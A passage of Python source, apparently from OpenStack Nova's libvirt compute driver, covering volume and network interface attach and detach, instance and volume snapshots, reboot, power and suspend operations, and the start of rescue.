# finished. libvirt bug #1119173
while self._wait_for_block_job(domain, disk_path,
wait_for_job_clean=True):
time.sleep(0.5)
domain.blockResize(disk_path, resize_to * units.Gi / units.Ki)
finally:
self._conn.defineXML(xml)
def swap_volume(self, old_connection_info,
new_connection_info, instance, mountpoint, resize_to):
instance_name = instance['name']
virt_dom = self._lookup_by_name(instance_name)
disk_dev = mountpoint.rpartition("/")[2]
xml = self._get_disk_xml(virt_dom.XMLDesc(0), disk_dev)
if not xml:
raise exception.DiskNotFound(location=disk_dev)
disk_info = {
'dev': disk_dev,
'bus': blockinfo.get_disk_bus_for_disk_dev(
CONF.libvirt.virt_type, disk_dev),
'type': 'disk',
}
conf = self._connect_volume(new_connection_info, disk_info)
if not conf.source_path:
self._disconnect_volume(new_connection_info, disk_dev)
raise NotImplementedError(_("Swap only supports host devices"))
self._swap_volume(virt_dom, disk_dev, conf.source_path, resize_to)
self._disconnect_volume(old_connection_info, disk_dev)
@staticmethod
def _get_disk_xml(xml, device):
"""Returns the xml for the disk mounted at device."""
try:
doc = etree.fromstring(xml)
except Exception:
return None
ret = doc.findall('./devices/disk')
for node in ret:
for child in node.getchildren():
if child.tag == 'target':
if child.get('dev') == device:
return etree.tostring(node)
def _get_existing_domain_xml(self, instance, network_info,
block_device_info=None):
try:
virt_dom = self._lookup_by_name(instance['name'])
xml = virt_dom.XMLDesc(0)
except exception.InstanceNotFound:
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info)
xml = self._get_guest_xml(nova_context.get_admin_context(),
instance, network_info, disk_info,
block_device_info=block_device_info)
return xml
def detach_volume(self, connection_info, instance, mountpoint,
encryption=None):
instance_name = instance['name']
disk_dev = mountpoint.rpartition("/")[2]
try:
virt_dom = self._lookup_by_name(instance_name)
xml = self._get_disk_xml(virt_dom.XMLDesc(0), disk_dev)
if not xml:
raise exception.DiskNotFound(location=disk_dev)
else:
# NOTE(vish): We can always affect config because our
# domains are persistent, but we should only
# affect live if the domain is running.
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state in (power_state.RUNNING, power_state.PAUSED):
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(xml, flags)
if encryption:
# The volume must be detached from the VM before
# disconnecting it from its encryptor. Otherwise, the
# encryptor may report that the volume is still in use.
encryptor = self._get_volume_encryptor(connection_info,
encryption)
encryptor.detach_volume(**encryption)
except exception.InstanceNotFound:
# NOTE(zhaoqin): If the instance does not exist, _lookup_by_name()
# will throw InstanceNotFound exception. Need to
# disconnect volume under this circumstance.
LOG.warn(_LW("During detach_volume, instance disappeared."))
except libvirt.libvirtError as ex:
# NOTE(vish): This is called to cleanup volumes after live
# migration, so we should still disconnect even if
# the instance doesn't exist here anymore.
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
# NOTE(vish):
LOG.warn(_LW("During detach_volume, instance disappeared."))
else:
raise
self._disconnect_volume(connection_info, disk_dev)
def attach_interface(self, instance, image_meta, vif):
virt_dom = self._lookup_by_name(instance['name'])
flavor = objects.Flavor.get_by_id(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
self.vif_driver.plug(instance, vif)
self.firewall_driver.setup_basic_filtering(instance, [vif])
cfg = self.vif_driver.get_config(instance, vif, image_meta,
flavor, CONF.libvirt.virt_type)
try:
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING or state == power_state.PAUSED:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.attachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError:
LOG.error(_LE('attaching network adapter failed.'),
instance=instance)
self.vif_driver.unplug(instance, vif)
raise exception.InterfaceAttachFailed(
instance_uuid=instance['uuid'])
def detach_interface(self, instance, vif):
virt_dom = self._lookup_by_name(instance['name'])
flavor = objects.Flavor.get_by_id(
nova_context.get_admin_context(read_deleted='yes'),
instance['instance_type_id'])
cfg = self.vif_driver.get_config(instance, vif, None, flavor,
CONF.libvirt.virt_type)
try:
self.vif_driver.unplug(instance, vif)
flags = libvirt.VIR_DOMAIN_AFFECT_CONFIG
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
if state == power_state.RUNNING or state == power_state.PAUSED:
flags |= libvirt.VIR_DOMAIN_AFFECT_LIVE
virt_dom.detachDeviceFlags(cfg.to_xml(), flags)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_NO_DOMAIN:
LOG.warn(_LW("During detach_interface, "
"instance disappeared."),
instance=instance)
else:
LOG.error(_LE('detaching network adapter failed.'),
instance=instance)
raise exception.InterfaceDetachFailed(
instance_uuid=instance['uuid'])
def _create_snapshot_metadata(self, base, instance, img_fmt, snp_name):
metadata = {'is_public': False,
'status': 'active',
'name': snp_name,
'properties': {
'kernel_id': instance['kernel_id'],
'image_location': 'snapshot',
'image_state': 'available',
'owner_id': instance['project_id'],
'ramdisk_id': instance['ramdisk_id'],
}
}
if instance['os_type']:
metadata['properties']['os_type'] = instance['os_type']
# NOTE(vish): glance forces ami disk format to be ami
if base.get('disk_format') == 'ami':
metadata['disk_format'] = 'ami'
else:
metadata['disk_format'] = img_fmt
metadata['container_format'] = base.get('container_format', 'bare')
return metadata
def snapshot(self, context, instance, image_id, update_task_state):
"""Create snapshot from a running VM instance.
This command only works with qemu 0.14+
"""
try:
virt_dom = self._lookup_by_name(instance['name'])
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance['uuid'])
base_image_ref = instance['image_ref']
base = compute_utils.get_image_metadata(
context, self._image_api, base_image_ref, instance)
snapshot = self._image_api.get(context, image_id)
disk_path = libvirt_utils.find_disk(virt_dom)
source_format = libvirt_utils.get_disk_type(disk_path)
image_format = CONF.libvirt.snapshot_image_format or source_format
# NOTE(bfilippov): save lvm and rbd as raw
if image_format == 'lvm' or image_format == 'rbd':
image_format = 'raw'
metadata = self._create_snapshot_metadata(base,
instance,
image_format,
snapshot['name'])
snapshot_name = uuid.uuid4().hex
state = LIBVIRT_POWER_STATE[virt_dom.info()[0]]
# NOTE(rmk): Live snapshots require QEMU 1.3 and Libvirt 1.0.0.
# These restrictions can be relaxed as other configurations
# can be validated.
if self._has_min_version(MIN_LIBVIRT_LIVESNAPSHOT_VERSION,
MIN_QEMU_LIVESNAPSHOT_VERSION,
REQ_HYPERVISOR_LIVESNAPSHOT) \
and not source_format == "lvm" and not source_format == 'rbd':
live_snapshot = True
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended. This operation also
# confirms the running instance, as opposed to the system as a
# whole, has a new enough version of the hypervisor (bug 1193146).
try:
virt_dom.blockJobAbort(disk_path, 0)
except libvirt.libvirtError as ex:
error_code = ex.get_error_code()
if error_code == libvirt.VIR_ERR_CONFIG_UNSUPPORTED:
live_snapshot = False
else:
pass
else:
live_snapshot = False
# NOTE(rmk): We cannot perform live snapshots when a managedSave
# file is present, so we will use the cold/legacy method
# for instances which are shutdown.
if state == power_state.SHUTDOWN:
live_snapshot = False
# NOTE(dkang): managedSave does not work for LXC
if CONF.libvirt.virt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING or state == power_state.PAUSED:
self._detach_pci_devices(virt_dom,
pci_manager.get_instance_pci_devs(instance))
virt_dom.managedSave(0)
snapshot_backend = self.image_backend.snapshot(disk_path,
image_type=source_format)
if live_snapshot:
LOG.info(_LI("Beginning live snapshot process"),
instance=instance)
else:
LOG.info(_LI("Beginning cold snapshot process"),
instance=instance)
update_task_state(task_state=task_states.IMAGE_PENDING_UPLOAD)
snapshot_directory = CONF.libvirt.snapshots_directory
fileutils.ensure_tree(snapshot_directory)
with utils.tempdir(dir=snapshot_directory) as tmpdir:
try:
out_path = os.path.join(tmpdir, snapshot_name)
if live_snapshot:
# NOTE(xqueralt): libvirt needs o+x in the temp directory
os.chmod(tmpdir, 0o701)
self._live_snapshot(virt_dom, disk_path, out_path,
image_format)
else:
snapshot_backend.snapshot_extract(out_path, image_format)
finally:
new_dom = None
# NOTE(dkang): because previous managedSave is not called
# for LXC, _create_domain must not be called.
if CONF.libvirt.virt_type != 'lxc' and not live_snapshot:
if state == power_state.RUNNING:
new_dom = self._create_domain(domain=virt_dom)
elif state == power_state.PAUSED:
new_dom = self._create_domain(domain=virt_dom,
launch_flags=libvirt.VIR_DOMAIN_START_PAUSED)
if new_dom is not None:
self._attach_pci_devices(new_dom,
pci_manager.get_instance_pci_devs(instance))
LOG.info(_LI("Snapshot extracted, beginning image upload"),
instance=instance)
# Upload that image to the image service
update_task_state(task_state=task_states.IMAGE_UPLOADING,
expected_state=task_states.IMAGE_PENDING_UPLOAD)
with libvirt_utils.file_open(out_path) as image_file:
self._image_api.update(context,
image_id,
metadata,
image_file)
LOG.info(_LI("Snapshot image upload complete"),
instance=instance)
@staticmethod
def _wait_for_block_job(domain, disk_path, abort_on_error=False,
wait_for_job_clean=False):
"""Wait for libvirt block job to complete.
Libvirt may return either cur==end or an empty dict when
the job is complete, depending on whether the job has been
cleaned up by libvirt yet, or not.
:returns: True if still in progress
False if completed
"""
status = domain.blockJobInfo(disk_path, 0)
if status == -1 and abort_on_error:
msg = _('libvirt error while requesting blockjob info.')
raise exception.NovaException(msg)
try:
cur = status.get('cur', 0)
end = status.get('end', 0)
except Exception:
return False
if wait_for_job_clean:
job_ended = not status
else:
job_ended = cur == end
return not job_ended
def _live_snapshot(self, domain, disk_path, out_path, image_format):
"""Snapshot an instance without downtime."""
# Save a copy of the domain's persistent XML file
xml = domain.XMLDesc(
libvirt.VIR_DOMAIN_XML_INACTIVE |
libvirt.VIR_DOMAIN_XML_SECURE)
# Abort is an idempotent operation, so make sure any block
# jobs which may have failed are ended.
try:
domain.blockJobAbort(disk_path, 0)
except Exception:
pass
# NOTE (rmk): We are using shallow rebases as a workaround to a bug
# in QEMU 1.3. In order to do this, we need to create
# a destination image with the original backing file
# and matching size of the instance root disk.
src_disk_size = libvirt_utils.get_disk_size(disk_path)
src_back_path = libvirt_utils.get_disk_backing_file(disk_path,
basename=False)
disk_delta = out_path + '.delta'
libvirt_utils.create_cow_image(src_back_path, disk_delta,
src_disk_size)
try:
# NOTE (rmk): blockRebase cannot be executed on persistent
# domains, so we need to temporarily undefine it.
# If any part of this block fails, the domain is
# re-defined regardless.
if domain.isPersistent():
domain.undefine()
# NOTE (rmk): Establish a temporary mirror of our root disk and
# issue an abort once we have a complete copy.
domain.blockRebase(disk_path, disk_delta, 0,
libvirt.VIR_DOMAIN_BLOCK_REBASE_COPY |
libvirt.VIR_DOMAIN_BLOCK_REBASE_REUSE_EXT |
libvirt.VIR_DOMAIN_BLOCK_REBASE_SHALLOW)
while self._wait_for_block_job(domain, disk_path):
time.sleep(0.5)
domain.blockJobAbort(disk_path, 0)
libvirt_utils.chown(disk_delta, os.getuid())
finally:
self._conn.defineXML(xml)
# Convert the delta (CoW) image with a backing file to a flat
# image with no backing file.
libvirt_utils.extract_snapshot(disk_delta, 'qcow2',
out_path, image_format)
def _volume_snapshot_update_status(self, context, snapshot_id, status):
"""Send a snapshot status update to Cinder.
This method captures and logs exceptions that occur
since callers cannot do anything useful with these exceptions.
Operations on the Cinder side waiting for this will time out if
a failure occurs sending the update.
:param context: security context
:param snapshot_id: id of snapshot being updated
:param status: new status value
"""
try:
self._volume_api.update_snapshot_status(context,
snapshot_id,
status)
except Exception:
LOG.exception(_LE('Failed to send updated snapshot status '
'to volume service.'))
def _volume_snapshot_create(self, context, instance, domain,
volume_id, snapshot_id, new_file):
"""Perform volume snapshot.
:param domain: VM that volume is attached to
:param volume_id: volume UUID to snapshot
:param snapshot_id: UUID of snapshot being created
:param new_file: relative path to new qcow2 file present on share
"""
xml = domain.XMLDesc(0)
xml_doc = etree.fromstring(xml)
device_info = vconfig.LibvirtConfigGuest()
device_info.parse_dom(xml_doc)
disks_to_snap = [] # to be snapshotted by libvirt
network_disks_to_snap = [] # network disks (netfs, gluster, etc.)
disks_to_skip = [] # local disks not snapshotted
for guest_disk in device_info.devices:
if (guest_disk.root_name != 'disk'):
continue
if (guest_disk.target_dev is None):
continue
if (guest_disk.serial is None or guest_disk.serial != volume_id):
disks_to_skip.append(guest_disk.target_dev)
continue
# disk is a Cinder volume with the correct volume_id
disk_info = {
'dev': guest_disk.target_dev,
'serial': guest_disk.serial,
'current_file': guest_disk.source_path,
'source_protocol': guest_disk.source_protocol,
'source_name': guest_disk.source_name,
'source_hosts': guest_disk.source_hosts,
'source_ports': guest_disk.source_ports
}
# Determine path for new_file based on current path
if disk_info['current_file'] is not None:
current_file = disk_info['current_file']
new_file_path = os.path.join(os.path.dirname(current_file),
new_file)
disks_to_snap.append((current_file, new_file_path))
elif disk_info['source_protocol'] in ('gluster', 'netfs'):
network_disks_to_snap.append((disk_info, new_file))
if not disks_to_snap and not network_disks_to_snap:
msg = _('Found no disk to snapshot.')
raise exception.NovaException(msg)
snapshot = vconfig.LibvirtConfigGuestSnapshot()
for current_name, new_filename in disks_to_snap:
snap_disk = vconfig.LibvirtConfigGuestSnapshotDisk()
snap_disk.name = current_name
snap_disk.source_path = new_filename
snap_disk.source_type = 'file'
snap_disk.snapshot = 'external'
snap_disk.driver_name = 'qcow2'
snapshot.add_disk(snap_disk)
for disk_info, new_filename in network_disks_to_snap:
snap_disk = vconfig.LibvirtConfigGuestSnapshotDisk()
snap_disk.name = disk_info['dev']
snap_disk.source_type = 'network'
snap_disk.source_protocol = disk_info['source_protocol']
snap_disk.snapshot = 'external'
snap_disk.source_path = new_filename
old_dir = disk_info['source_name'].split('/')[0]
snap_disk.source_name = '%s/%s' % (old_dir, new_filename)
snap_disk.source_hosts = disk_info['source_hosts']
snap_disk.source_ports = disk_info['source_ports']
snapshot.add_disk(snap_disk)
for dev in disks_to_skip:
snap_disk = vconfig.LibvirtConfigGuestSnapshotDisk()
snap_disk.name = dev
snap_disk.snapshot = 'no'
snapshot.add_disk(snap_disk)
snapshot_xml = snapshot.to_xml()
LOG.debug("snap xml: %s", snapshot_xml)
snap_flags = (libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_DISK_ONLY |
libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_NO_METADATA |
libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_REUSE_EXT)
QUIESCE = libvirt.VIR_DOMAIN_SNAPSHOT_CREATE_QUIESCE
try:
domain.snapshotCreateXML(snapshot_xml,
snap_flags | QUIESCE)
return
except libvirt.libvirtError:
LOG.exception(_LE('Unable to create quiesced VM snapshot, '
'attempting again with quiescing disabled.'))
try:
domain.snapshotCreateXML(snapshot_xml, snap_flags)
except libvirt.libvirtError:
LOG.exception(_LE('Unable to create VM snapshot, '
'failing volume_snapshot operation.'))
raise
def _volume_refresh_connection_info(self, context, instance, volume_id):
bdm = objects.BlockDeviceMapping.get_by_volume_id(context,
volume_id)
driver_bdm = driver_block_device.DriverVolumeBlockDevice(bdm)
driver_bdm.refresh_connection_info(context, instance,
self._volume_api, self)
def volume_snapshot_create(self, context, instance, volume_id,
create_info):
"""Create snapshots of a Cinder volume via libvirt.
:param instance: VM instance object reference
:param volume_id: id of volume being snapshotted
:param create_info: dict of information used to create snapshots
- snapshot_id : ID of snapshot
- type : qcow2 / <other>
- new_file : qcow2 file created by Cinder which
becomes the VM's active image after
the snapshot is complete
"""
LOG.debug("volume_snapshot_create: create_info: %(c_info)s",
{'c_info': create_info}, instance=instance)
try:
virt_dom = self._lookup_by_name(instance.name)
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance.uuid)
if create_info['type'] != 'qcow2':
raise exception.NovaException(_('Unknown type: %s') %
create_info['type'])
snapshot_id = create_info.get('snapshot_id', None)
if snapshot_id is None:
raise exception.NovaException(_('snapshot_id required '
'in create_info'))
try:
self._volume_snapshot_create(context, instance, virt_dom,
volume_id, snapshot_id,
create_info['new_file'])
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Error occurred during '
'volume_snapshot_create, '
'sending error status to Cinder.'))
self._volume_snapshot_update_status(
context, snapshot_id, 'error')
self._volume_snapshot_update_status(
context, snapshot_id, 'creating')
def _wait_for_snapshot():
snapshot = self._volume_api.get_snapshot(context, snapshot_id)
if snapshot.get('status') != 'creating':
self._volume_refresh_connection_info(context, instance,
volume_id)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_snapshot)
timer.start(interval=0.5).wait()
def _volume_snapshot_delete(self, context, instance, volume_id,
snapshot_id, delete_info=None):
"""Note:
if file being merged into == active image:
do a blockRebase (pull) operation
else:
do a blockCommit operation
Files must be adjacent in snap chain.
:param instance: instance object reference
:param volume_id: volume UUID
:param snapshot_id: snapshot UUID (unused currently)
:param delete_info: {
'type': 'qcow2',
'file_to_merge': 'a.img',
'merge_target_file': 'b.img' or None (if merging file_to_merge into
active image)
}
Libvirt blockjob handling required for this method is broken
in versions of libvirt that do not contain:
http://libvirt.org/git/?p=libvirt.git;h=0f9e67bfad (1.1.1)
(Patch is pending in 1.0.5-maint branch as well, but we cannot detect
libvirt 1.0.5.5 vs. 1.0.5.6 here.)
"""
if not self._has_min_version(MIN_LIBVIRT_BLOCKJOBINFO_VERSION):
ver = '.'.join([str(x) for x in MIN_LIBVIRT_BLOCKJOBINFO_VERSION])
msg = _("Libvirt '%s' or later is required for online deletion "
"of volume snapshots.") % ver
raise exception.Invalid(msg)
LOG.debug('volume_snapshot_delete: delete_info: %s', delete_info)
if delete_info['type'] != 'qcow2':
msg = _('Unknown delete_info type %s') % delete_info['type']
raise exception.NovaException(msg)
try:
virt_dom = self._lookup_by_name(instance.name)
except exception.InstanceNotFound:
raise exception.InstanceNotRunning(instance_id=instance.uuid)
# Find dev name
my_dev = None
active_disk = None
xml = virt_dom.XMLDesc(0)
xml_doc = etree.fromstring(xml)
device_info = vconfig.LibvirtConfigGuest()
device_info.parse_dom(xml_doc)
active_disk_object = None
for guest_disk in device_info.devices:
if (guest_disk.root_name != 'disk'):
continue
if (guest_disk.target_dev is None or guest_disk.serial is None):
continue
if guest_disk.serial == volume_id:
my_dev = guest_disk.target_dev
active_disk = guest_disk.source_path
active_protocol = guest_disk.source_protocol
active_disk_object = guest_disk
break
if my_dev is None or (active_disk is None and active_protocol is None):
msg = _('Disk with id: %s '
'not found attached to instance.') % volume_id
LOG.debug('Domain XML: %s', xml)
raise exception.NovaException(msg)
LOG.debug("found device at %s", my_dev)
def _get_snap_dev(filename, backing_store):
if filename is None:
msg = _('filename cannot be None')
raise exception.NovaException(msg)
# libgfapi delete
LOG.debug("XML: %s" % xml)
LOG.debug("active disk object: %s" % active_disk_object)
# determine reference within backing store for desired image
filename_to_merge = filename
matched_name = None
b = backing_store
index = None
current_filename = active_disk_object.source_name.split('/')[1]
if current_filename == filename_to_merge:
return my_dev + '[0]'
while b is not None:
source_filename = b.source_name.split('/')[1]
if source_filename == filename_to_merge:
LOG.debug('found match: %s' % b.source_name)
matched_name = b.source_name
index = b.index
break
b = b.backing_store
if matched_name is None:
msg = _('no match found for %s') % (filename_to_merge)
raise exception.NovaException(msg)
LOG.debug('index of match (%s) is %s' % (b.source_name, index))
my_snap_dev = '%s[%s]' % (my_dev, index)
return my_snap_dev
if delete_info['merge_target_file'] is None:
# pull via blockRebase()
# Merge the most recent snapshot into the active image
rebase_disk = my_dev
rebase_flags = 0
rebase_base = delete_info['file_to_merge'] # often None
if active_protocol is not None:
rebase_base = _get_snap_dev(delete_info['file_to_merge'],
active_disk_object.backing_store)
rebase_bw = 0
LOG.debug('disk: %(disk)s, base: %(base)s, '
'bw: %(bw)s, flags: %(flags)s',
{'disk': rebase_disk,
'base': rebase_base,
'bw': rebase_bw,
'flags': rebase_flags})
result = virt_dom.blockRebase(rebase_disk, rebase_base,
rebase_bw, rebase_flags)
if result == 0:
LOG.debug('blockRebase started successfully')
while self._wait_for_block_job(virt_dom, my_dev,
abort_on_error=True):
LOG.debug('waiting for blockRebase job completion')
time.sleep(0.5)
else:
# commit with blockCommit()
my_snap_base = None
my_snap_top = None
commit_disk = my_dev
commit_flags = 0
if active_protocol is not None:
my_snap_base = _get_snap_dev(delete_info['merge_target_file'],
active_disk_object.backing_store)
my_snap_top = _get_snap_dev(delete_info['file_to_merge'],
active_disk_object.backing_store)
try:
commit_flags |= libvirt.VIR_DOMAIN_BLOCK_COMMIT_RELATIVE
except AttributeError:
ver = '.'.join(
[str(x) for x in
MIN_LIBVIRT_BLOCKCOMMIT_RELATIVE_VERSION])
msg = _("Relative blockcommit support was not detected. "
"Libvirt '%s' or later is required for online "
"deletion of network storage-backed volume "
"snapshots.") % ver
raise exception.Invalid(msg)
commit_base = my_snap_base or delete_info['merge_target_file']
commit_top = my_snap_top or delete_info['file_to_merge']
bandwidth = 0
LOG.debug('will call blockCommit with commit_disk=%(commit_disk)s '
'commit_base=%(commit_base)s '
'commit_top=%(commit_top)s '
% {'commit_disk': commit_disk,
'commit_base': commit_base,
'commit_top': commit_top})
result = virt_dom.blockCommit(commit_disk, commit_base, commit_top,
bandwidth, commit_flags)
if result == 0:
LOG.debug('blockCommit started successfully')
while self._wait_for_block_job(virt_dom, my_dev,
abort_on_error=True):
LOG.debug('waiting for blockCommit job completion')
time.sleep(0.5)
def volume_snapshot_delete(self, context, instance, volume_id, snapshot_id,
delete_info):
try:
self._volume_snapshot_delete(context, instance, volume_id,
snapshot_id, delete_info=delete_info)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Error occurred during '
'volume_snapshot_delete, '
'sending error status to Cinder.'))
self._volume_snapshot_update_status(
context, snapshot_id, 'error_deleting')
self._volume_snapshot_update_status(context, snapshot_id, 'deleting')
self._volume_refresh_connection_info(context, instance, volume_id)
def reboot(self, context, instance, network_info, reboot_type,
block_device_info=None, bad_volumes_callback=None):
"""Reboot a virtual machine, given an instance reference."""
if reboot_type == 'SOFT':
# NOTE(vish): This will attempt to do a graceful shutdown/restart.
try:
soft_reboot_success = self._soft_reboot(instance)
except libvirt.libvirtError as e:
LOG.debug("Instance soft reboot failed: %s", e)
soft_reboot_success = False
if soft_reboot_success:
LOG.info(_LI("Instance soft rebooted successfully."),
instance=instance)
return
else:
LOG.warn(_LW("Failed to soft reboot instance. "
"Trying hard reboot."),
instance=instance)
return self._hard_reboot(context, instance, network_info,
block_device_info)
def _soft_reboot(self, instance):
"""Attempt to shutdown and restart the instance gracefully.
We use shutdown and create here so we can return if the guest
responded and actually rebooted. Note that this method only
succeeds if the guest responds to acpi. Therefore we return
success or failure so we can fall back to a hard reboot if
necessary.
:returns: True if the reboot succeeded
"""
dom = self._lookup_by_name(instance["name"])
state = LIBVIRT_POWER_STATE[dom.info()[0]]
old_domid = dom.ID()
# NOTE(vish): This check allows us to reboot an instance that
# is already shutdown.
if state == power_state.RUNNING:
dom.shutdown()
# NOTE(vish): This actually could take slightly longer than the
# FLAG defines depending on how long the get_info
# call takes to return.
self._prepare_pci_devices_for_use(
pci_manager.get_instance_pci_devs(instance))
for x in xrange(CONF.libvirt.wait_soft_reboot_seconds):
dom = self._lookup_by_name(instance["name"])
state = LIBVIRT_POWER_STATE[dom.info()[0]]
new_domid = dom.ID()
# NOTE(ivoks): By checking domain IDs, we make sure we are
# not recreating domain that's already running.
if old_domid != new_domid:
if state in [power_state.SHUTDOWN,
power_state.CRASHED]:
LOG.info(_LI("Instance shutdown successfully."),
instance=instance)
self._create_domain(domain=dom)
timer = loopingcall.FixedIntervalLoopingCall(
self._wait_for_running, instance)
timer.start(interval=0.5).wait()
return True
else:
LOG.info(_LI("Instance may have been rebooted during soft "
"reboot, so return now."), instance=instance)
return True
greenthread.sleep(1)
return False
def _hard_reboot(self, context, instance, network_info,
block_device_info=None):
"""Reboot a virtual machine, given an instance reference.
Performs a Libvirt reset (if supported) on the domain.
If Libvirt reset is unavailable this method actually destroys and
re-creates the domain to ensure the reboot happens, as the guest
OS cannot ignore this action.
If xml is set, it uses the passed in xml in place of the xml from the
existing domain.
"""
self._destroy(instance)
# Get the system metadata from the instance
system_meta = utils.instance_sys_meta(instance)
# Convert the system metadata to image metadata
image_meta = utils.get_image_from_system_metadata(system_meta)
if not image_meta:
image_ref = instance.get('image_ref')
image_meta = compute_utils.get_image_metadata(context,
self._image_api,
image_ref,
instance)
disk_info = blockinfo.get_disk_info(CONF.libvirt.virt_type,
instance,
block_device_info,
image_meta)
# NOTE(vish): This could generate the wrong device_format if we are
# using the raw backend and the images don't exist yet.
# The create_images_and_backing below doesn't properly
# regenerate raw backend images, however, so when it
# does we need to (re)generate the xml after the images
# are in place.
xml = self._get_guest_xml(context, instance, network_info, disk_info,
image_meta=image_meta,
block_device_info=block_device_info,
write_to_disk=True)
# NOTE (rmk): Re-populate any missing backing files.
disk_info_json = self._get_instance_disk_info(instance['name'], xml,
block_device_info)
instance_dir = libvirt_utils.get_instance_path(instance)
self._create_images_and_backing(context, instance, instance_dir,
disk_info_json)
# Initialize all the necessary networking, block devices and
# start the instance.
self._create_domain_and_network(context, xml, instance, network_info,
block_device_info, reboot=True,
vifs_already_plugged=True)
self._prepare_pci_devices_for_use(
pci_manager.get_instance_pci_devs(instance))
def _wait_for_reboot():
"""Called at an interval until the VM is running again."""
state = self.get_info(instance)['state']
if state == power_state.RUNNING:
LOG.info(_LI("Instance rebooted successfully."),
instance=instance)
raise loopingcall.LoopingCallDone()
timer = loopingcall.FixedIntervalLoopingCall(_wait_for_reboot)
timer.start(interval=0.5).wait()
def pause(self, instance):
"""Pause VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.suspend()
def unpause(self, instance):
"""Unpause paused VM instance."""
dom = self._lookup_by_name(instance['name'])
dom.resume()
def _clean_shutdown(self, instance, timeout, retry_interval):
"""Attempt to shutdown the instance gracefully.
:param instance: The instance to be shutdown
:param timeout: How long to wait in seconds for the instance to
shutdown
:param retry_interval: How often in seconds to signal the instance
to shutdown while waiting
:returns: True if the shutdown succeeded
"""
# List of states that represent a shutdown instance
SHUTDOWN_STATES = [power_state.SHUTDOWN,
power_state.CRASHED]
try:
dom = self._lookup_by_name(instance["name"])
except exception.InstanceNotFound:
# If the instance has gone then we don't need to
# wait for it to shutdown
return True
(state, _max_mem, _mem, _cpus, _t) = dom.info()
state = LIBVIRT_POWER_STATE[state]
if state in SHUTDOWN_STATES:
LOG.info(_LI("Instance already shutdown."),
instance=instance)
return True
LOG.debug("Shutting down instance from state %s", state,
instance=instance)
dom.shutdown()
retry_countdown = retry_interval
for sec in six.moves.range(timeout):
dom = self._lookup_by_name(instance["name"])
(state, _max_mem, _mem, _cpus, _t) = dom.info()
state = LIBVIRT_POWER_STATE[state]
if state in SHUTDOWN_STATES:
LOG.info(_LI("Instance shutdown successfully after %d "
"seconds."), sec, instance=instance)
return True
# Note(PhilD): We can't assume that the Guest was able to process
# any previous shutdown signal (for example it may
# have still been startingup, so within the overall
# timeout we re-trigger the shutdown every
# retry_interval
if retry_countdown == 0:
retry_countdown = retry_interval
# Instance could shutdown at any time, in which case we
# will get an exception when we call shutdown
try:
LOG.debug("Instance in state %s after %d seconds - "
"resending shutdown", state, sec,
instance=instance)
dom.shutdown()
except libvirt.libvirtError:
# Assume this is because its now shutdown, so loop
# one more time to clean up.
LOG.debug("Ignoring libvirt exception from shutdown "
"request.", instance=instance)
continue
else:
retry_countdown -= 1
time.sleep(1)
LOG.info(_LI("Instance failed to shutdown in %d seconds."),
timeout, instance=instance)
return False
def power_off(self, instance, timeout=0, retry_interval=0):
"""Power off the specified instance."""
if timeout:
self._clean_shutdown(instance, timeout, retry_interval)
self._destroy(instance)
def power_on(self, context, instance, network_info,
block_device_info=None):
"""Power on the specified instance."""
# We use _hard_reboot here to ensure that all backing files,
# network, and block device connections, etc. are established
# and available before we attempt to start the instance.
self._hard_reboot(context, instance, network_info, block_device_info)
def suspend(self, instance):
"""Suspend the specified instance."""
dom = self._lookup_by_name(instance['name'])
self._detach_pci_devices(dom,
pci_manager.get_instance_pci_devs(instance))
dom.managedSave(0)
def resume(self, context, instance, network_info, block_device_info=None):
"""resume the specified instance."""
xml = self._get_existing_domain_xml(instance, network_info,
block_device_info)
dom = self._create_domain_and_network(context, xml, instance,
network_info, block_device_info=block_device_info,
vifs_already_plugged=True)
self._attach_pci_devices(dom,
pci_manager.get_instance_pci_devs(instance))
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""resume guest state when a host is booted."""
# Check if the instance is running already and avoid doing
# anything if it is.
try:
domain = self._lookup_by_name(instance['name'])
state = LIBVIRT_POWER_STATE[domain.info()[0]]
ignored_states = (power_state.RUNNING,
power_state.SUSPENDED,
power_state.NOSTATE,
power_state.PAUSED)
if state in ignored_states:
return
except exception.NovaException:
pass
# Instance is not up and could be in an unknown state.
# Be as absolute as possible about getting it back into
# a known and running state.
self._hard_reboot(context, instance, network_info, block_device_info)
def rescue(self, context, instance, network_info, image_meta,
rescue_password):
"""Loads a VM using rescue images.
A rescue is normally performed when something goes wrong with the
primary images and data needs to be corrected/recovered. Rescuing
should not edit or over-ride the original image, only allow for
data recovery.
"""
instance_dir = libvirt_utils.get_instance_path(instance)
unrescue_xml = self._get_existing_domain_xml(instance, network_info)
unrescue_xml_path = os.path.join(instance_dir, 'unrescue.xml')
libvirt_utils.write_to_file(unrescue_xml_path, unrescue_xml)
if image_meta is not None:
rescue_image_id = image_meta.get('id')
else:
rescue_image_id = None
rescue_images = {
'image_id': (rescue_image_id or
CONF.libvirt.rescue_image_id or instance.image_ref),
'kernel_id': (CONF.libvirt.rescue_kernel_id or
instance.kernel_id),
